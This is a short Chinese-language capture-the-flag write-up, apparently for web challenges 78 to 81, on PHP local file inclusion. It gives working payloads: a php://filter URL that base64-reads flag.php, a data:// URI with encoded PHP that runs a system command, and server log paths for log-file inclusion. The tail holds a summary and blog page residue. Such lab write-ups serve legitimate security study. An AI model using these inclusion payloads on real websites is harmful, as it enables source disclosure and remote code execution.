- web78
读取源代码:

心想,就这?
直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
直接:
http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
成功获取flag.php的文件内容,在线网址解base64:
https://tool.oschina.net/encrypt?type=3

- web79
此题和也是利用PHP中的伪协议:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);
- web80
本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
nginx: /var/log/nginx/access.log
apache: /var/log/httpd/access_log
bp拦截:


- web81
此题和80题是一样的方法。

本文介绍如何使用PHP伪协议来读取并获取特定文件的内容,包括通过base64编码绕过限制的方法,以及针对不同服务器配置如nginx的日志文件包含技巧。
1301

被折叠的 条评论
为什么被折叠?



